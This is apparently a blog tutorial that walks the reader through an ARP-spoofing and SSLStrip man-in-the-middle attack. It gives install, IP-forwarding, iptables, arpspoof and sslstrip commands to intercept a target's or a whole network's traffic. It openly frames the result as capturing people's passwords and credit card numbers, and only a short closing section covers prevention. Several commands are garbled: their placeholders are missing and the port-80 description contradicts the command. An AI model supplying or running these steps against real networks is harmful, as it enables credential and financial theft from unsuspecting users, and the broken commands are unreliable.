How does this work?
First, arpspoof tricks the router that we are the target, and the target that we are the router. This lets us recieve all the traffic from the target that is meant to go to the router. From there, we can modify any of the traffic that we receive. Once we receive traffic, we send all traffic except traffic meant for port 80 (http traffic) to SSL Strip. SSL Strip will then watch for HTTPS links and redirects, and then will map those links to either similar http links or homograph-smilar HTTPS links. Therefore all the traffic is now unencrypted and sent in plain-text and we can easily see passwords and other sensitive data submitted over the network.
Instructions:
1. First off, you need to make sure you have Python and Twisted Web installed. Also, you will need to have the dsniff suite installed
sudo apt-get install python
sudo apt-get install python-twisted
sudo apt-get install dsniff
2. Once both of those dependencies are installed you have to make sure traffic forwarding is enabled.
echo “1” > /proc/sys/net/ipv4/ip_forward
3. Now you have to forward all traffic except port 80 to a listening port (for example, where it says , you can type “1000” without quotes.
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port
4. Download SSL Strip from Moxie Marlinspike’s (the awesome guy who created SSL Strip) website. Once it’s downloaded, you can install it by typing sudo python setup.py install into your CLI (Command Line Interface). Make sure you are in the correct directory.
cd /Whatever/Directory/SSLStrip/is/In
sudo python setup.py install
5. Lastly, you need to trick everyone (or a single target/computer) that the router is your computer. (Where put your wireless card, where put the targets IP, where gatewayIP is put the gateways IP. Usually 192.168.1.1 or 192.168.0.1) If you want to target the entire network, use the 3rd command.
arpspoof -i -t
e.g “arpspoof -i wlan0 -t 192.168.1.199 192.168.1.1
arpspoof -i
Starting SSLStrip “sslstrip -l <listenPort>” without quotes
Congratulations, you have successfully routed every packet through your computer and are able to capture people’s passwords, credit cards, and other sensitive information. Always remember though:
With great power, comes great responsibility
How to Prevent this sort of attack?
There are a couple of options. The easiest, is to use a VPN. This will make it impossible for someone to follow these instructions and get your information. If you don’t want to do that, you can also use HTTPS Everywhere which will force everything to go through HTTPS and will not let it go through HTTP. This option also works, but if you can, use a VPN.
Thanks for reading and if you have any questions or tips (or just want to say thanks), let me know in the comments!
